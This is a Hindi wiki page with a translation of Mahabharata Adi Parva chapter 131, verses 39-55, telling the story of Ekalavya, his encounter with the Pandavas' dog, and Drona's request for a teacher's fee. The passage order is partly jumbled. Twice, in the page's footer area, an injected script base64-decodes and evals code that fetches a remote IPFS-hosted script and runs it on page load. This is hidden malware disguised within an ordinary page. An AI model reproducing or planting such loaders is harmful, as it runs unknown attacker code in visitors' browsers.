महाभारत आदि पर्व अध्याय 131 श्लोक 39-55

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ

एकत्रिंशदधिकशततम (131) अध्‍याय: आदि पर्व (सम्भाव पर्व)

महाभारत: आदि पर्व: > एकत्रिंशदधिकशततम अध्‍याय: श्लोक 39-55 का हिन्दी अनुवाद

एकलव्‍य के शरीर का रंग काला था। उसके अंगों में मैल जम गया था और उसने काला मृगचर्म एवं जटा धारण कर रखी थी। निषादपुत्र को इस रूप में देखकर वह कुत्ता भौं-भौं करके भूंकता हुआ उसके पास खड़ा हो गया । यह देख भील ने अस्त्रलाघव का परिचय देते हुए उस भूंकने वाले कुत्ते के मुख में मानो एक ही साथ सात वाण मारे । उसका मुंह वाणों से भर गया और वह उसी अवस्‍था में पाण्‍डवों के पास आया। उसे देखकर पाण्‍डव वीर बड़े विस्‍मय में पड़े । वह हाथ की फु‍र्ती और शब्‍द के अनुसार लक्ष्‍य वेधने की उत्तम शक्ति देखकर उस समय सब राजकुमार उस कु्त्ते की ओर दृष्टि डालकर लज्जित हो गये और सब प्रकार से बाण मारने वाले की प्रशंसा करने लगे । राजन् ! तत्‍पश्‍चात् पाण्‍डवों ने उस वनवासी वीर की वन में खोज करते हुए उसे निरन्‍तर बाण चलाते हुए देखा । उस समय उसका रुप बदल गया था । पाण्‍डव उसे पहचान न सके; अत: पूछने लगे- ‘तुम कौन हो, किसके पुत्र हो?’ । एकलव्‍य ने कहा- वीरो ! आप लोग मुझे निषादराज हिरण्‍यधनु का पुत्र तथा द्रोणाचार्य का शिष्‍य जानें। मैंने धनुर्वेद में विशेष परिश्रम किया है । वैशम्‍पायनजी कहते हैं-राजन् ! वे पाण्‍डव लोग उस निषाद का यथार्थ परिचय पाकर लौट आये और वन में जो अद्भुत घटना घटी थी, वह सब उन्‍होंने द्रोणाचार्य से कह सुनायी । अजनमेजय ! कुन्‍तीनन्‍दन अर्जुन बार-बार एकलव्‍य का स्‍मरण करते हुए एकान्‍त में द्रोण से मिलकर प्रेमपूर्वक यों बोले ।।४७।। अर्जुन ने कहा- आचार्य ! उस दिन तो आपने मुझ अकेले को हृदय से लगाकर बड़ी प्रसन्नता के साथ यह बात कही थी कि मेरा कोई भी शिष्‍य तुमसे बढ़कर नहीं होगा । फिर आप का यह अन्‍य शिष्‍य निषादराज का पुत्र अस्त्रविद्या में मुझसे बढ़कर कुशल और सम्‍पूर्ण लोक से भी अधिक पराक्रमी कैसे हुआ? । वैशम्‍पायनजी कहते हैं-जनमेजय ! आचार्य द्रोण उस निषाद पुत्र के विषय में दो घड़ी तक कुछ सोचते-विचारते रहे; फिर कुछ निश्चय करके वे सव्‍यसाची अर्जुन को साथ ले उसके पास गये । वहां पहुंचकर उन्‍होंने एकलव्‍य को देखा, जो हाथ में धनुष ले निरन्‍तर बाणों की वर्षा कर रहा था। उसके शरीर पर मैल जम गया था। उसने सिर पर जटा धारणकर रक्‍खी थी और वस्त्र के स्‍थान पर चिथड़े लपेट रक्‍खे थे । इधर एकलव्‍य ने आचार्य द्रोण को समीप आते देख आगे बढ़कर उनकी अगवानी की और उनके चरण पकड़कर पृथ्‍वी पर माथा टेक दिया । फिर उस निषाद कुमार ने अपने को शिष्‍य रूप से उनके चरणों में समर्पित करके गुरु द्रोण की विधिपूर्वक पूजा की और हाथ जोड़कर उनके सामने खड़ा हो गया। राजन् ! तब द्रोणाचार्य ने एकलव्‍य से यह बात कही- ‘वीर ! यदि तुम मेरे शिष्‍य हो तो मुझे गुरुदक्षिणा दो’ । यह सुनकर एकलव्‍य बहुत प्रसन्न हुआ और इस प्रकार बोला । एकलव्‍य ने कहा- भगवन् ! मैं आपको क्‍या दूं? स्‍वयं गुरुदेव ही मुझे इसके लिये आज्ञा दें। ब्रह्मवेत्ताओं में श्रेष्ठ आचार्य ! मेरे पास कोई ऐसी वस्‍तु नहीं, जो गुरु के लिये अदेय हो । का अभ्‍यास प्रारम्भ किया। वह बड़े नियम के साथ रहता था । आचार्य में उत्तम श्रद्धा रखकर और भारी अभ्‍यास बल से उसने बाणों के छोड़ने, लौटाने और संधान करने में बड़ी अच्‍छी फुर्ती प्राप्त कर ली । शत्रुओं का दमन करने वाले जनमेजय! तदनन्‍तर एक दिन समस्‍त कौरव और पाण्‍डव आचार्य द्रोण की अनुमति से रथों पर बैठकर (हिंसक पशुओं का) शिकार खेलने के लिये निकले । इस कार्य के लिये आवश्‍यक सामग्री लेकर कोई मनुष्‍य स्‍वेच्‍छानुसार अकेला ही उन पाण्‍डवों के पीछे-पीछे चला। उसने साथ में एक कुत्ता भी ले रक्‍खा था । वे सब अपना-अपना काम पूरा करने की इच्‍छा से वन में इधर-उधर विचर रहे थे। उनका वह मूढ़ कुत्ता वन में घूमता-घामता निषाद पुत्र एकलव्‍य पास जा पहुंचा ।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>